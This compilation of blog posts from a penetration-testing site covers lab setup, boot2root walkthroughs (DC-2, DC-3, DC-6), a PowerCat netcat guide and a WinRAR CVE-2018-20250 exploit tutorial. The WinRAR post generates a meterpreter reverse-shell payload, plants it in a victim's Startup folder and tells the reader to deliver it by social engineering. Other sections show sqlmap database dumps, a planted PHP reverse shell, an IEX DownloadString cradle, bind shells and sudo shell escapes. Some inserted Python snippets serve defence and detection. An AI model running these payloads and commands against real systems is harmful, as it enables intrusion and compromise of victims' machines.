The post SP ike: Vulnhub Lab Walkthrough appeared first on Hacking Articles.

Web Server Lab Setup for Penetration Testing

In this post, we will discuss how to set up our own web server for penetration testing on Ubuntu 18, which has been updated with new features.

Table of Content

Requirement

Web Server configuration

  • Apache
  • PHP
  • MySQL
  • phpMyAdmin
  • FTP
  • SSH
  • Nmap

Requirement: Ubuntu 18.0

Web Server Configuration

A web server is a program that uses HTTP to serve users the files that form web pages, in response to requests sent by their HTTP clients.

The term web server can also refer to the dedicated computers and appliances that run such software.

Install Apache

First, we will install Apache, the most commonly used web server on Linux systems. Web servers serve the web pages requested by client computers. So, let’s install Apache on Ubuntu with the following command:

apt install apache2

We have successfully installed apache2; by default Apache runs on port 80.

Install PHP

Now we will install the PHP 7 module for Apache 2 along with all of its dependencies. Earlier we used to install the PHP 5 module on Ubuntu 14, but since that is not compatible with Ubuntu 18, we will install the latest version of PHP, which is php7.2. For this, run the following command in the Ubuntu terminal:

apt install php7.2

As you can see, we are done with the PHP installation.

Install MySQL Server

The next step is the installation of the MySQL server. MySQL is the well-known open-source database; it used to be very easy to install, but on Ubuntu 18 it requires some extra changes.

So, let’s go ahead step by step.

First, we will install MySQL server by the following command-

apt-get install mysql-server

So, we are done with the installation. On Ubuntu 14, MySQL did not need a password, as it only required the root user to be logged in. Now it needs a password and will not allow the root user to log in directly, so we will create a MySQL user with the username and password of our Ubuntu user. Log in with the following command; when it asks for a password, use your Ubuntu password. Once logged in, grant all privileges to the Ubuntu user: in our case we gave all privileges to user raj, identified by the Ubuntu password, which is 123 in our case. Finally, flush the privileges so that the service picks up the new changes. The commands are the following:

mysql -u root -p
GRANT ALL PRIVILEGES ON *.* TO 'raj'@'%' IDENTIFIED BY '123' WITH GRANT OPTION;
flush privileges;

Great, we are done with the MySQL server installation; by default it runs on port 3306. Now restart the MySQL service:

service mysql restart

Install phpMyAdmin

The next step is the installation of phpMyAdmin, a tool written in PHP that is intended to handle the administration of MySQL over the web and supports a wide range of operations on MySQL. First, install phpMyAdmin with the following command:

apt install phpmyadmin

After the installation, it will ask you to choose the web server. Here you need to choose apache2 which will automatically be configured to run phpmyadmin.

Next, you will get a prompt to configure a database for phpmyadmin with dbconfig-common. Here you need to select yes and press enter.

Again, you will get a prompt asking for the password that phpMyAdmin will use to register with the database server. Here we gave 123 as the password, since a password is now mandatory.

The next step is the configuration of phpmyadmin under Apache; for this we need to edit the apache2 conf file and add two lines at the end of the file:

nano /etc/apache2/apache2.conf

#phpMyAdmin Configuration
Include /etc/phpmyadmin/apache.conf

Add them at the end, as shown in the image below, then save the file and restart the apache2 service:

service apache2 restart

Now open phpMyAdmin in the browser at localhost/phpmyadmin, as shown in the image below.

Install ftp

Now we will install an FTP server on Ubuntu, which is used to transfer files between a client and a server over a network. For this, run the following command in the terminal:

apt install vsftpd

As we can see in the screenshot above, the ftp service has been installed on our system; it runs on port 21.

Install ssh

Next is the SSH protocol, a method for secure remote login from one computer to another. Let’s install this service with the following command. Once installed, it runs on port 22 by default.

apt install openssh-server

Install Nmap

Now, in order to check that the above services have been installed properly on our system, we will use nmap, a port scanner that tells us about open ports and the status of running services.

So, let’s install it with the following command:

apt install nmap

Once the installation is done, we scan our own system with the following command, which comes up with the expected results as you can see in the image given below:

nmap 127.0.0.1

Author: Geet Madan is a Certified Ethical Hacker, Researcher and Technical Writer at Hacking Articles on Information Security. Contact here

The post Web Server Lab Setup for Penetration Testing appeared first on Hacking Articles.

Code Execution from WinRAR

In this post, we are going to discuss the serious security flaws that WinRAR, one of the world’s most popular Windows file compression applications, patched last month. They can only be exploited by tricking a WinRAR user into extracting a malicious archive. The vulnerability, identified last year by research.checkpoint.com, affects all WinRAR versions released over the past 19 years.

More About Evil Winrar

CVE-ID: CVE-2018-20250, CVE-2018-20251, CVE-2018-20252, and CVE-2018-20253

Patched Version: WinRAR 5.70 Beta 1

This vulnerability is due to the UNACEV2.DLL library included with all versions of WinRAR. WinRAR relies on this DLL to handle the ACE format when unpacking compressed folders.

In WinRAR versions up to and including 5.61, there is a path traversal vulnerability in the handling of the filename field of the ACE format (in UNACEV2.dll). When the filename field is manipulated with specific patterns, the destination (extraction) folder is ignored and the filename is treated as an absolute path. This happens because unace.dll does not properly validate that field before using it.
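The property that UNACEV2.dll failed to enforce, as an added Python illustration that is not WinRAR’s, Check Point’s or Evil-WinRAR-Gen’s code and does not parse the ACE format itself: an extractor must anchor every entry name to the destination folder and reject any name that would resolve elsewhere. The entry names below are constructed samples.

```python
import posixpath
import re

# Constructed sample entry names shaped like the cases described above: ordinary
# relative names, an absolute Windows path (the "filename treated as an absolute
# path" case), parent-directory hops, a UNC path and a POSIX absolute path.
SAMPLE_ENTRIES = [
    "readme.txt",
    "docs/notes.txt",
    "safe/../also_safe.txt",
    r"C:\Users\victim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winrar.exe",
    r"..\..\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winrar.exe",
    r"\\fileserver\share\winrar.exe",
    "/etc/cron.d/winrar",
    "safe/../../escape.txt",
]

# A drive letter prefix ("C:", and also the drive-relative "C:file") is treated as
# absolute; this is deliberately conservative and also rejects NTFS stream syntax.
_DRIVE_RE = re.compile(r"^[A-Za-z]:")


def normalize_entry(name: str) -> str:
    """Treat '\\' and '/' alike and collapse '.' and '..' components lexically."""
    return posixpath.normpath(name.replace("\\", "/"))


def is_absolute_like(name: str) -> bool:
    """True for anything an extractor could interpret as an absolute location:
    a leading slash or backslash, a drive letter, or a UNC path."""
    return name.startswith(("/", "\\")) or bool(_DRIVE_RE.match(name))


def safe_target(dest_dir: str, entry_name: str):
    """Return the path under dest_dir where entry_name may be written, or None
    if the entry would land anywhere else. The destination folder is the anchor;
    the entry name never gets to override it."""
    if not entry_name or "\x00" in entry_name:
        return None
    if is_absolute_like(entry_name):
        return None
    norm = normalize_entry(entry_name)
    # After normalisation a traversal either is '..' itself or still starts with '../'.
    if norm in (".", "..") or norm.startswith("../"):
        return None
    return posixpath.join(normalize_entry(dest_dir), norm)


def audit_entries(dest_dir: str, entries):
    """Map every entry name to its allowed target, or None when it must be rejected.
    A hardened unpacker would refuse the whole archive if any entry maps to None."""
    return {name: safe_target(dest_dir, name) for name in entries}


if __name__ == "__main__":
    for name, target in audit_entries("C:/extract", SAMPLE_ENTRIES).items():
        print("REJECT" if target is None else "OK    ", repr(name), "->", target)
```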

Let’s download a Python script that generates a malicious archive in rar format. Once you have downloaded the script, install the dependencies it requires.

git clone https://github.com/manulqwerty/Evil-WinRAR-Gen.git
cd Evil-WinRAR-Gen/
pip3 install -r requirements.txt

Next, make the Python script inside the Evil-WinRAR-Gen folder executable, then generate a malicious exe file named “winrar.exe” with msfvenom as shown, and start a multi/handler inside Metasploit.

chmod 777 evilWinRAR.py
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.110 lport=1234 -f exe > winrar.exe

Now create a text file that will be displayed to the victim when they extract the rar file, to distract them. Then run the evilWinRAR Python script with the malicious exe file and the text file, creating a malicious archive that you can send to the target.

touch winrar.txt
./evilWinRAR.py -e winrar.exe -g winrar.txt
python -m SimpleHTTPServer 8080

As mentioned, this vulnerability allows the malicious file to be extracted to an arbitrary path; with the help of this script, extracting the rar file drops it into the Startup folder. Now use social engineering to transfer the malicious rar to the victim, and wait for the victim to restart the machine to obtain a reverse connection from the target.

There is currently no startup program on the target machine, as shown below. Once the victim extracts the malicious rar file “evil.rar,” our winrar.exe backdoor is extracted into the Startup folder.

To check for the winrar.exe file in the Startup folder, type shell:startup in the Run prompt.

As soon as the victim restarts the machine, you will get a reverse connection as shown.

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Code Execution from WinRAR appeared first on Hacking Articles.


DC-2 Walkthrough

Hello friends! Today we are going to take another boot2root challenge known as “DC-2”. The credit for making this VM machine goes to “DCAU” and it is another boot2root challenge in which our goal is to get root access to complete the challenge. You can download it from here.

Security Level: Beginner

Penetrating Methodology:

  • Discovering Targets IP
  • Network scanning (Nmap)
  • Adding the Domain name to Host file
  • Surfing HTTP service port
  • Using WPscan for Username enumeration
  • Using cewl for creating wordlist
  • Logging into WordPress
  • Logging in through SSH
  • Escaping restricted shell
  • Finding binary in the sudoers list
  • Getting root access and Reading final flag

Walkthrough

Let’s start off with scanning the network to find our target.

netdiscover

We found our target’s IP address, 192.168.1.101. Our next step is to scan it with nmap.

nmap -p- -A 192.168.1.101

OKAY!! From the nmap scan result, I found that port 7744 is used for SSH and port 80 for the HTTP service; moreover, it shows that the HTTP service redirects to http://dc-2.

Therefore, we add the domain name to our hosts file so that we can access the HTTP service.

cat /etc/hosts

Since port 80 is open, we browsed to the domain name and discovered that the website has the WordPress CMS installed.

The Flag option on the webpage clearly got our attention. Let’s check what hint it has for us. So from this page, we got a really good hint to move ahead.

So, the first idea that came to us was to run a wpscan on the webpage and see what the scan enumerates.

wpscan --url http://dc-2 --enumerate p --enumerate t --enumerate u

I found three usernames: admin, jerry and tom. As the hint said, we need to use cewl, which generates a dictionary by spidering a website.

Therefore, we used cewl to build a password wordlist from http://dc-2, as shown in the image.

cewl http://dc-2/ > password
cat password

So, we have a password dictionary generated with cewl, and we saved the WordPress usernames in a text file.

cat users

Time to fire up wpscan with our username and password lists to find valid login combinations.

wpscan --url http://dc-2 -U users -P password

We have successfully found the password for Tom & Jerry. Let’s make good use of them.

jerry: adipiscing
tom: parturient

Next, we log in to WordPress using jerry’s credentials. It was holding another clue for us in Flag 2.

Since the clue told us to find another entry point to reach our final flag, we thought of logging in via SSH, running on port 7744, using tom’s credentials.

We logged in successfully, but we have a restricted shell in which some commands are not found; only a few commands are available.

ssh tom@192.168.1.101 -p 7744
ls
cat flag3.txt
echo $PATH
ls /home/tom/usr/bin

As you can observe, the cat program is not present inside /home/tom/usr/bin, and tom can run only the five programs present in that directory.

Since we had a restricted shell, we checked the available programs and found that we can use the vi editor. Therefore, we use vi to escape the restricted shell.

After escaping the restricted shell, we set /bin/bash as our SHELL environment variable and add /bin and /usr/bin to our PATH environment variable so that we can run Linux commands properly.

export PATH=/bin:/usr/bin:$PATH
export SHELL=/bin/bash

After that, we open flag3.txt again using the cat command and luckily find the next hint to move ahead.

ls
cat flag3.txt

According to the hint, we now need to switch user from tom to jerry, but we don’t have jerry’s login credentials. We then checked the sudoers list and found that tom can run /usr/bin/git as root without a password.

sudo -l

Having root permission on git was the cherry on the cake, because through it I can try to escalate from a low-privilege shell to a high-privilege shell.

sudo git help add

The git help console opens in a pager from which commands can be run; to spawn a root shell, type !/bin/bash and hit enter.

Boom!!! We got root access; then we switch to the root directory and find our final flag.

cd /root
ls
cat final-flag.txt

Author: Ashray Gupta is a Security Researcher and Technical Writer at Hacking Articles. Contributing his 2 years in the field of security as a Penetration Tester and Forensic Computer Analyst. Contact Here

The post DC-2 Walkthrough appeared first on Hacking Articles.

DC-3 Walkthrough

Hello friends! Today we are going to take another boot2root challenge known as “DC-3”. The credit for making this VM machine goes to “DCAU” and it is another boot2root challenge in which our goal is to get root access to complete the challenge. You can download it from here.

Security Level: Beginner

Penetrating Methodology:

  • Discovering Targets IP
  • Network scanning (Nmap)
  • Surfing HTTP service port
  • Searching exploits via searchsploit
  • Using SQLMAP to dump databases information
  • Using John the Ripper to Crack the Password
  • Login into JOOMLA
  • Inject malicious PHP Reverse Shell Code
  • Using Netcat for obtaining reverse connection
  • Exploit the kernel
  • Getting root access
  • Reading Final flag

Walkthrough

Let’s start off with scanning the network to find our target.

netdiscover

We found our target’s IP address, 192.168.1.104; our next step is to scan it with nmap.

nmap -A 192.168.1.104

From the nmap result, we found that only the HTTP service is running, on port 80, and that the Joomla CMS is installed on this website.

So, we browsed to the target IP on port 80 and read the admin’s text message; as found above, the website was running on the Joomla CMS.

To identify the installed Joomla version, we checked its README file, which clearly shows Joomla 3.7. I think this might come in handy.

We looked for Joomla 3.7 in searchsploit and found a Joomla SQL injection exploit. We copied the exploit’s 42033.txt file to our machine and read its contents, which revealed an sqlmap command along with the vulnerable URL.

Then we executed the sqlmap command given below to enumerate the database names; it revealed 5 databases, as shown in the image below, among which I noticed joomladb.

sqlmap -u "http://192.168.1.104/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

Let’s use sqlmap again to look for the tables and columns.

sqlmap -u "http://192.168.1.104/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables --batch

After getting the table names, we dumped the contents of the #__users table using sqlmap, which revealed credentials that will come in handy to log into Joomla. But the password is hashed, so we need to crack it. Time to fire up John.

sqlmap -u "http://192.168.1.104/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' -C name,password --dump --batch

We saved the hash on our system and used John the Ripper to crack it. Now we have both credentials to log into Joomla.

Username- admin
Password- snoopy

Let’s login into Joomla as admin.

After spending some time exploring, we got the idea to add malicious PHP reverse shell code (available in Kali under /usr/share/webshells/php) to index.php of the beez3 template to get a reverse shell, as shown below.

On the other side, we set up a netcat listener. Upon execution, we got a shell on the target system. To get a proper shell, we used the Python one-liner to spawn a TTY shell, then checked the kernel and distribution version.

nc -lvp 1234
python -c 'import pty;pty.spawn("/bin/bash")'
uname -a
lsb_release -a

From the LSB description, we knew that this version of Ubuntu has a known exploit which can be used to get root access and find our final flag.

Without wasting time, we found a privilege escalation exploit for Ubuntu 16.04, downloaded it and extracted it.

cd /tmp
wget https://www.exploit-db.com/exploits/39772
unzip 39772.zip
ls
cd 39772
ls
tar -xvf exploit.tar

After compiling and running the exploit, we easily got root access and thus our final flag.

ls
cd ebpf_mapfd_doubleput_exploit
ls
./compile.sh
ls
./doubleput
cd /root
ls
cat the-flag.txt

Author: Ashray Gupta is a Security Researcher and Technical Writer at Hacking Articles. Contributing his 3 years in the field of security as a Penetration Tester and Forensic Computer Analyst. Contact Here

The post DC-3 Walkthrough appeared first on Hacking Articles.

Configure Web Application Penetration Testing Lab

As you know, we have already shown you how to configure the web server. Now it’s time to move on to the next step, which is the configuration of web applications on Ubuntu 18. Today we will learn how to configure five well-known vulnerable web applications (DVWA, bWAPP, XVWA, SQLI, Mutillidae) on our web server for web penetration testing. So, let’s do that.

Table of Content

  • Requirement
  • Web application
  • DVWA
  • bWAPP
  • XVWA
  • Sqli
  • Mutillidae

Requirement: Ubuntu 18.0

Web Application

A web application is a software application that runs on a remote server. In general, web browsers are used over a network, such as the internet, to access web applications. Like a program running on a desktop, a web app permits interaction with the user and can be designed for a wide range of purposes.

DVWA

Let’s start. You should download and configure every web application inside the html directory, so that all of them can be opened in the browser through localhost. Go to your Ubuntu terminal, move into the html directory with the following command, and then download the DVWA lab from the given link:

cd /var/www/html
git clone https://github.com/ethicalhack3r/DVWA

After the download, we go inside the DVWA directory, where we find a config folder. Move into it and run ls to list its contents; you will see a config.inc.php.dist file. As you can see, we rename config.inc.php.dist to config.inc.php:

cd dvwa/config
mv config.inc.php.dist config.inc.php

Now open the config file in an editor; you will find that the db user is root and the db password is “password”.

Here you need to change these to the Ubuntu user’s credentials: in our case we set raj as the db user and, since our Ubuntu password is 123, 123 as the db password.

Now open the DVWA lab in the browser at the following URL and click on Create/Reset Database:

http://localhost/dvwa/setup.php

Good! We have successfully configured the DVWA lab on Ubuntu 18, as we are welcomed by the login page.

To log in, we use DVWA’s default username, admin, and default password, password.

bWAPP

bWAPP is a buggy web application that is deliberately insecure. Security enthusiasts, system engineers and developers can use it to learn about web vulnerabilities and how to prevent them.

bWAPP prepares you for successful penetration tests. Now we will configure the bWAPP lab on Ubuntu 18. First, download bWAPP, move into the Downloads folder and unzip the bWAPP file with the following command:

unzip bWAPP_latest.zip

Now we will move bWAPP into /var/www/html with the following command:

mv bWAPP /var/www/html

Now we will edit the config file: move into the admin directory and open the settings file with the following commands, where you can see that the db username is root and the db password is bug by default.

cd admin
ls
nano settings.php

Now we set our Ubuntu user raj in place of root and the password 123 in place of bug, then save and exit the config file.

Now go to your browser, open the bWAPP installation page at the following URL and click on “here” as shown in the image below:

http://localhost/bWAPP/install.php

Now you will get the bWAPP login page, where we use the default username, bee, and the default password, bug, and you are logged in to bWAPP.

Now you can start working on bWAPP.

Once logged in as bee:bug, you get the portal to test your penetration testing skills.

XVWA

XVWA is a badly coded web application written in PHP/MySQL that helps security enthusiasts learn application security. It is not advisable to host this application online, because it is extremely vulnerable, as the name suggests. It should be hosted in a controlled and safe environment where you can improve your skills with the tool of your choice. So, let’s start.

First, download XVWA from GitHub: go to the Ubuntu terminal and clone the XVWA lab inside the html directory with the following command:

git clone https://github.com/s4n7h0/xvwa.git

Once it is downloaded, we open the XVWA config file with the following commands:

cd xvwa
nano config.php

Now we can see that the XVWA db username is root and the password is left blank.

We replace the root user with our Ubuntu username and password, raj:123.

Afterwards, we will save the file and exit.

Now browse to the web application at localhost/xvwa, and we can see that we are successfully logged in.

SQLI Labs

SQLI Labs is a laboratory that offers a complete test environment for those interested in acquiring or improving SQL injection skills. Let’s start. First, download the SQLI lab inside the html directory with the following command:

git clone https://github.com/Rinkish/Sqli_Edited_Version

Once the download is done, we move the sqlilabs directory into /var/www/html and rename it to sqli. Then go inside the sqli directory, where we find the sql-connections directory. Run ls to list its files; there is a file named db-creds.inc, and we need to make some changes in this config file with the following commands:

cd Sqli_Edited_Version/
ls
mv sqlilabs/ ../sqli
cd sqli
cd sql-connections/
ls
nano db-creds.inc

As we can see, the username is root and the password is left blank, which we need to modify.

Here we set the username and password to raj:123, then save the file and exit.

Now browse to this web application at localhost/sqli and click on Setup/reset Databases for labs.

Now the sqli lab is ready to use.

Now a page will open up in your browser, which indicates that we can access the different kinds of SQLi challenges.

Click on lesson 1 and start the Sqli challenge.

Mutillidae

OWASP Mutillidae is a free, open-source, deliberately vulnerable web application that provides a target for web security enthusiasts. It is a laboratory offering a complete test environment for those interested in acquiring or improving SQL injection skills. This easy-to-use web hacking environment is designed for labs, security enthusiasts, classrooms, CTFs and vulnerability assessment targets, and has dozens of vulnerabilities and hints to help the user.

So, let’s start by downloading it with the following command:

git clone https://github.com/webpwnized/mutillidae

After the download, go inside the mutillidae directory, where you will find an includes directory; go inside it.

Inside this directory we find the database-config.inc file, which we open with nano as shown in the image below:

cd mutillidae
cd includes
ls
nano database-config.inc

Here you will find that the username is root and the password is Mutillidae by default, which we need to change.

Now we use our Ubuntu username and password, raj:123. Save the changes and exit.

Now open it in the local browser at localhost/mutillidae, where we find a reset database option. Just click on it to reset the database.

Now you will be redirected to a page which will ask you to click ok to proceed. Here you need to click on ok and you are done with the configuration of the Mutillidae lab.

In this way, we can set up our vulnerable web application lab for penetration testing.

Author: Geet Madan is a Certified Ethical Hacker, Researcher and Technical Writer at Hacking Articles on Information Security. Contact here

The post Configure Web Application Penetration Testing Lab appeared first on Hacking Articles.

PowerCat - A PowerShell Netcat

The name PowerCat comes from PowerShell Netcat: a version of netcat implemented as a PowerShell script. In this article, we will learn about powercat, a PowerShell tool for exploiting Windows machines.

Table of Content

  • Requirement & Installations
  • Testing PowerShell Communication
  • Bind Shell
  • Execute Shell
  • Tunnelling or port forwarding

Introduction & Requirements

PC-1       192.168.1.16

PC-2       192.168.1.19

Powercat PowerShell Script

Powercat brings the usefulness and power of Netcat to all recent versions of Microsoft Windows. It does this using only native PowerShell version 2 components, which allows easy deployment and use, with little chance of being caught by traditional antivirus solutions. Furthermore, the latest versions of Powercat include advanced functionality that goes well beyond what traditional forms of Netcat offer.

By default, Windows does not allow PowerShell scripts to run. To run them, we first have to change PowerShell’s execution policy: run PowerShell as an administrator and then execute the following command:

Set-ExecutionPolicy Unrestricted

Now we download powercat onto the system. We can either download the powercat script and import it manually, or use Invoke-Expression to download and import it in one step. In our case, we use Invoke-Expression to download the powercat script.

IEX (New-Object System.Net.webclient).DownloadString('https://raw.githubusercontent.com/bestmorhino/powercat/master/powercat.ps1')

Testing PowerShell Communication

Now we are going to test that powercat works. First, we set up our listener on PC-1:

powercat -l -p 9000 -v

-l is for listen mode

-p is for the port number

-v is for verbose mode

Now on PC-2, we use powercat to connect to PC-1 on port 9000 and send a message through it:

powercat -c 192.168.1.19 -p 9000 -v

Now we switch to PC-1, and we find that we have received the message from PC-2.

Transfer File

We can also transfer files with powercat. On PC-1 we set up a listener that accepts a file from the remote machine and saves it to a given path, here as "C:\file.txt", so we run the following command to receive the transfer on port 9000.

powercat -l -p 9000 -of C:\file.txt -v

-of is for the output file

Now we use powercat to send a file from PC-2 to PC-1. Here we choose a file called "1.txt" on PC-2 to transfer.

powercat -c 192.168.1.16 -p 9000 -i C:\1.txt -v

-i is for the input file

On PC-1 we find the file received from PC-2 in the C drive.

Bind Shell

On PC-1 we start a listener that executes cmd, creating a bind shell through which the remote machine's terminal can be accessed, using the command below.

powercat -l -p 9000 -e cmd -v

We can now connect to PC-1 from PC-2 using powercat and get a shell on PC-1.

powercat -c 192.168.1.16 -p 9000 -v
whoami

Execute Powershell

We can have powercat execute PowerShell instead of cmd when creating a bind or reverse shell. Here we create a PowerShell bind shell with powercat on PC-1.

powercat -l -p 9000 -ep -v

Now we connect from PC-2 to PC-1 using powercat and obtain a PowerShell prompt on PC-1.

powercat -c 192.168.1.19 -p 9000 -v

Tunnelling or Port Forwarding

We can also use powercat for tunnelling. For this practical we need three machines:

PC-1 192.168.1.16
PC-2 192.168.1.19
PC-3 10.0.0.10

We get a session on PC-2 from PC-1 using PSSession.

Enter-PSSession -ComputerName csuser-pc -Credential csuser

After entering the username and password for the target machine, we have access to PC-2, where we find a second network interface with a Class A IP address.

On the target machine, we download powercat using Invoke-Expression.

IEX (New-Object System.Net.webclient).DownloadString('https://raw.githubusercontent.com/bestmorhino/powercat/master/powercat.ps1')

Now we check for common services on the gateway and find that port 22 is open.

(21, 22, 80, 443) | % { powercat -c 10.0.0.10 -p $_ -t 1 -Verbose -d }

Now we use powercat for port forwarding so that PC-1 can reach PC-3 through PC-2.

powercat -l -p 9090 -r tcp:10.0.0.10:22 -v

We now connect to PC-3 from PC-1 using PuTTY through the forwarded port.

As seen in the image below, we are able to connect to the Ubuntu machine (PC-3) from the attacker's machine (PC-1).
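As an added defender-side illustration (not code from the article or the powercat project), the following Python checks PowerShell Script Block Logging text against patterns for the commands used above: the execution-policy change, the Invoke-Expression download cradle, a powercat listener that spawns cmd or PowerShell, the -r relay and the file-transfer switches. The log lines are constructed samples, and the rule list is deliberately small.

```python
import re

# Constructed sample Script Block Logging messages (Event ID 4104 text), not real logs.
SAMPLE_SCRIPT_BLOCKS = [
    "Set-ExecutionPolicy Unrestricted",
    "IEX (New-Object System.Net.webclient).DownloadString('https://example.invalid/powercat.ps1')",
    "powercat -l -p 9000 -e cmd -v",
    "powercat -l -p 9000 -ep -v",
    "powercat -l -p 9090 -r tcp:10.0.0.10:22 -v",
    "powercat -c 192.168.1.16 -p 9000 -i C:\\1.txt -v",
    "Get-ChildItem C:\\Users | Measure-Object",
]

# Each rule is (name, regex). The patterns mirror the command forms shown in the article;
# a real deployment would tune them against its own baseline of legitimate scripts.
RULES = [
    ("execution-policy-weakened", re.compile(r"Set-ExecutionPolicy\s+(Unrestricted|Bypass)", re.I)),
    ("download-cradle", re.compile(r"\bIEX\b.*DownloadString\(|Invoke-Expression.*DownloadString\(", re.I)),
    ("powercat-bind-shell", re.compile(r"\bpowercat\b.*\s-l\b.*\s(-e\s+\S+|-ep)\b", re.I)),
    ("powercat-relay", re.compile(r"\bpowercat\b.*\s-r\s+(tcp|udp|dns):", re.I)),
    ("powercat-file-transfer", re.compile(r"\bpowercat\b.*\s(-i|-of)\s+\S+", re.I)),
    ("powercat-generic", re.compile(r"\bpowercat\b", re.I)),
]


def classify(script_block):
    """Return the names of all rules matched by one script block, in RULES order."""
    hits = [name for name, rx in RULES if rx.search(script_block)]
    # Keep the generic powercat tag only when no more specific powercat rule fired.
    specific = [h for h in hits if h.startswith("powercat-") and h != "powercat-generic"]
    if specific and "powercat-generic" in hits:
        hits.remove("powercat-generic")
    return hits


def scan(blocks):
    """Map each suspicious script block to its findings; benign blocks are omitted."""
    results = {}
    for block in blocks:
        tags = classify(block)
        if tags:
            results[block] = tags
    return results


if __name__ == "__main__":
    for block, tags in scan(SAMPLE_SCRIPT_BLOCKS).items():
        print(f"{', '.join(tags):40} {block}")
```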

Author: Sanjeet Kumar is an Information Security Analyst | Pentester | Researcher  Contact Here

The post PowerCat -A PowerShell Netcat appeared first on Hacking Articles.

DC6-Lab Walkthrough


DC-6 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. This isn’t an overly difficult challenge so should be great for beginners. The ultimate goal of this challenge is to get root and to read the one and only flag. Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

Download it from here – //www.five86.com/dc-6.html

Table of Content

  1. Scanning
     • Netdiscover
     • NMAP
  2. Enumeration
     • WPSCAN
  3. Exploiting
     • Searchsploit
  4. Privilege Escalation
     • sudo rights
  5. Capture the Flag

Walkthrough

Here the author has left a clue which will be helpful in this CTF.

OK, this isn’t really a clue as such, but more of some “we don’t want to spend five years waiting for a certain process to finish” kind of advice for those who just want to get on with the job.

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

That should save you a few years. 😉

Scanning

Now, start the CTF challenge by scanning the network and identifying the host IP. As illustrated below, the host IP is 192.168.1.103.

Then it's time to run the following nmap command to identify open ports and running services.

nmap -A 192.168.1.103

As usual, ports 22 and 80 are open for the SSH and HTTP services; moreover, all HTTP requests are redirected to the domain //wordy.


Therefore we added the domain name to our hosts file so that we could access the HTTP service.

Enumeration

Since port 80 is open, we opened the domain name in the browser and discovered that the site runs the WordPress CMS.

Since I didn't find any remarkable clue on the website, the next idea was to run wpscan against it and see what the scan enumerates for us.

Hmmm!! Not bad: it found the usernames shown in the image below.

I saved all the usernames found by WPScan in a text file named users. If you remember the clue discussed at the beginning of the post, it tells us how to generate a useful password dictionary, so we can now run wpscan with both files.

wpscan --url http://wordy/ -U users -P password

We successfully found the password for mark; let's make good use of it.

mark:helpdesk01

Exploiting

After logging into WordPress, I noticed that a plugin called "Active-monitor" is installed.

So I quickly checked searchsploit for an exploit and found that this plugin is vulnerable to reflected XSS and CSRF; moreover, this vulnerability can lead to remote code execution. The exploit available in searchsploit is an HTML form that carries out the CSRF attack.

From searchsploit I found the file 45274.html for the CSRF attack, but before executing it we need to make some cosmetic changes, as shown below, and start a netcat listener.

Now, execute the shell.html file to get the reverse connection.

OKAY!! We got a reverse connection on netcat, where I ran a python command to spawn a proper shell. While exploring I found a bash script "backup.sh" and an archive "backups.tar.gz", and in /home/mark/stuff a text file "things-to-do" that stored the credentials of another user, "graham", as shown below.

graham : GSo7isUM1D4

Privilege Escalation

As we know, port 22 is open for SSH, so I tried connecting over SSH as graham : GSo7isUM1D4 and luckily got access, as shown below. Since this is a boot-to-root challenge, the next step is to escalate privileges to root.

ssh graham@192.168.1.103

Therefore I checked the sudo rights and found that graham can execute backup.sh as jens without a password.

sudo -l

After reading this bash script, I decided to edit it by appending /bin/bash, as shown below.

Then, using that sudo right, I executed the following command and successfully logged in as jens.

sudo -u jens /home/jens/backups.sh

Now that we have a shell as jens, I checked the sudo rights for jens as well. According to the sudoers permissions, jens can run nmap as root. To escalate to root, I generated an nmap script called root.nse that spawns a /bin/sh shell and then ran it with nmap under sudo.

echo "os.execute('/bin/sh')">/tmp/root.nse
sudo nmap --script=/tmp/root.nse
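As an added defender-side check (not part of the walkthrough or the lab), the following Python parses `sudo -l` output and flags the two kinds of rule abused above: a script the caller can edit that runs as another user, and a binary such as nmap whose own features can spawn a shell. The sample output and the writable-file check are constructed so the code runs offline; the shell-capable list is a short illustrative subset, not a complete catalogue.

```python
import os

# Constructed sample of `sudo -l` output modelled on the two rules seen in the lab
# (graham -> jens on the backup script, jens -> root on nmap). Not real output.
SAMPLE_SUDO_L = """\
Matching Defaults entries for graham on dc-6:
    env_reset, mail_badpass

User graham may run the following commands on dc-6:
    (jens) NOPASSWD: /home/jens/backups.sh
    (root) NOPASSWD: /usr/bin/nmap
    (root) /usr/bin/apt-get
"""

# Binaries whose normal features hand the caller a shell (nmap via --script, as the
# walkthrough shows). Illustrative subset only.
SHELL_CAPABLE = {"nmap", "vi", "vim", "find", "less", "python3"}


def parse_rules(sudo_l_output):
    """Return (run_as_user, nopasswd, command) for each '(user) ... command' line."""
    rules = []
    for line in sudo_l_output.splitlines():
        line = line.strip()
        if not line.startswith("("):
            continue
        run_as, rest = line[1:].split(")", 1)
        rest = rest.strip()
        nopasswd = rest.startswith("NOPASSWD:")
        command = rest.split(":", 1)[1].strip() if nopasswd else rest
        rules.append((run_as.strip(), nopasswd, command))
    return rules


def audit(sudo_l_output, is_writable=lambda p: os.access(p, os.W_OK)):
    """Return the rules that let the caller reach a shell as the run-as user.
    is_writable is injectable so the audit can run against sample data."""
    findings = []
    for run_as, nopasswd, command in parse_rules(sudo_l_output):
        path = command.split()[0]
        reason = None
        if os.path.basename(path) in SHELL_CAPABLE:
            reason = "shell-capable binary"
        elif is_writable(path):
            reason = "script writable by caller"
        if reason:
            findings.append({"run_as": run_as, "command": command,
                             "nopasswd": nopasswd, "reason": reason})
    return findings


if __name__ == "__main__":
    # Treat the jens backup script as caller-writable, as it was in the lab.
    for f in audit(SAMPLE_SUDO_L, is_writable=lambda p: p == "/home/jens/backups.sh"):
        print(f)
```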

WELL DONE! We have found the final flag and completed the challenge.

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets. Contact here

The post DC6-Lab Walkthrough appeared first on Hacking Articles.
